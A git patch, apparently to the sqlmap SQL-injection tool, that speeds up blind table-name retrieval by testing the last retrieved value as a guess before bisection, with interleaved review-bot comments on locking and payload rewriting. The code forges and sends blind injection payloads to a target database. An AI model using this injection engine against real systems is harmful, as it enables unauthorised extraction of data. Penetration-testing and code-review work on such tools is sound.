From 17554759b7ebcae907ce0a67454c7a5563df9245 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar
Date: Thu, 15 Apr 2010 09:36:13 +0000
Subject: [PATCH] implemented feature request from Ole Rasmussen regarding table name retrieval speedup
---
 lib/core/option.py | 1 +
 lib/techniques/blind/inference.py | 24 ++++++++++++++++++++++++
 plugins/generic/enumeration.py | 1 +
 3 files changed, 26 insertions(+)
diff --git a/lib/core/option.py b/lib/core/option.py
index 329c0773f..702d1f342 100644
--- a/lib/core/option.py
+++ b/lib/core/option.py
@@ -920,6 +920,7 @@ def __setKnowledgeBaseAttributes():
 kb.injParameter = None
 kb.injPlace = None
 kb.injType = None
+ kb.hintValue = None
 # Back-end DBMS underlying operating system fingerprint via banner (-b)
 # parsing
diff --git a/lib/techniques/blind/inference.py b/lib/techniques/blind/inference.py
index 3aaa8f004..047ca19d4 100644
--- a/lib/techniques/blind/inference.py
+++ b/lib/techniques/blind/inference.py
@@ -114,7 +114,31 @@ def bisection(payload, expression, length=None, charsetType=None, firstChar=None
 queriesCount = [0] # As list to deal with nested scoping rules
+ hintlock = threading.Lock()
+ def tryHint(idx):
+ hintlock.acquire()
+ hintValue = kb.hintValue
+ hintlock.release()
+ if hintValue and len(hintValue) >= idx:
+ if kb.dbms == "SQLite":
+ posValue = hintValue[idx-1]
+ else:
+ posValue = ord(hintValue[idx-1])
+
+ forgedPayload = safeStringFormat(payload.replace('%3E', '%3D'), (expressionUnescaped, idx, posValue))
+ result = Request.queryPage(urlencode(forgedPayload))
+ if result:
+ return hintValue[idx-1]
+ hintlock.acquire()
+ kb.hintValue = None
+ hintlock.release()
+ return None
+
 def getChar(idx, asciiTbl=asciiTbl):
+ result = tryHint(idx)
+ if result:
+ return result
+
 maxValue = asciiTbl[len(asciiTbl)-1]
 minValue = 0
diff --git a/plugins/generic/enumeration.py b/plugins/generic/enumeration.py
index 777f49f4c..c4a515281 100644
--- a/plugins/generic/enumeration.py
+++ b/plugins/generic/enumeration.py
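Review bot: `kb.hintValue = None` is added to __setKnowledgeBaseAttributes() without a comment saying what the attribute holds, while the attribute block just below it carries an explanatory one (`# Back-end DBMS underlying operating system fingerprint via banner (-b)`). A one-line note would save the next reader a trip into the inference code, e.g. `# Last value retrieved by blind inference, tried first as a guess for the next one (see lib/techniques/blind/inference.py)`. The enclosing function continues outside the hunk.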
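Review bot: tryHint pairs `hintlock.acquire()` and `hintlock.release()` by hand in two places; `with hintlock: hintValue = kb.hintValue` (and the same around `kb.hintValue = None`) releases the lock even if the guarded statement raises and reads more clearly. The read, the probe request and the clearing are not one atomic step, so a hint stored by another thread between the read and the clear is discarded too — presumably acceptable, since a lost hint only costs the normal bisection, but it deserves a comment on tryHint. `payload.replace('%3E', '%3D')` rewrites every URL-encoded `>` in the payload, not only the comparison operator; if a payload template can contain another `%3E` the forged probe would be malformed, so this should be confirmed against the callers. The hunk calls threading.Lock() but adds no import; check that inference.py already imports threading. The enclosing bisection() continues outside the hunk.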
@@ -783,6 +783,7 @@ class Enumeration:
 query = rootQuery["blind"]["query"] % (db, index)
 table = inject.getValue(query, inband=False)
 tables.append(table)
+ kb.hintValue = table
 if tables:
 kb.data.cachedTables[db] = tables
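Review bot: `kb.hintValue = table` writes the attribute without the lock that inference.py's tryHint takes around its reads and clears of the same field; a CPython reference assignment is atomic, so this is a consistency point rather than a breaking race, but it warrants a comment, e.g. `# hint for the next blind retrieval; consumed and cleared by bisection()`. The hint is also left holding the last table name after the loop ends, so the first unrelated blind retrieval that follows will spend at least one extra probe request before tryHint clears it; resetting `kb.hintValue = None` after the loop (outside this hunk) would avoid that. The enclosing method of class Enumeration starts and ends outside the hunk.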